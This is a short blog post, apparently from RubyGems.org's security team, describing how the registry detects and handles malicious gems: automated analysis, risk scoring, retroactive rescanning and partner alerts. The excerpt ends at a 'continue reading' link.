by Marty Haught
Recently, Socket.dev published research highlighting malicious gems designed to steal social media credentials. We wanted to use this as an opportunity to share more about how RubyGems.org security operates, how we proactively handled this incident (and others), and the work our team is doing each day to keep the ecosystem safe.
How We Detect Malicious Gems
RubyGems.org security uses a proactive and multi-layered approach:
1. Automated detection: Every gem upload is analyzed using both static and dynamic code analysis, including behavioral checks and metadata review. Much of this capability comes from Mend.ioβs supply chain security tooling (originally built by our own Maciej Mensfeld, a maintainer on the RubyGems team).
2. Risk scoring: Each package is given a score. Higher-risk gems are escalated for manual review by a member of our security team.
3. Retroactive scanning: As detection techniques improve, older packages are automatically rescanned, which allows us to catch threats that may have slipped through in the past. (This is how we found the threat actor that Socket.dev later investigated.)
4. External sources: We sometimes receive alerts from vulnerability databases, industry partners, and cross-registry collaborations, which help us identify patterns across ecosystems.
Through steps 1 - 3, our team detects the majority (roughly 70-80%) of malicious packages before they are ever reported to us or the public.
What Happens When We Flag a Gem
... continue reading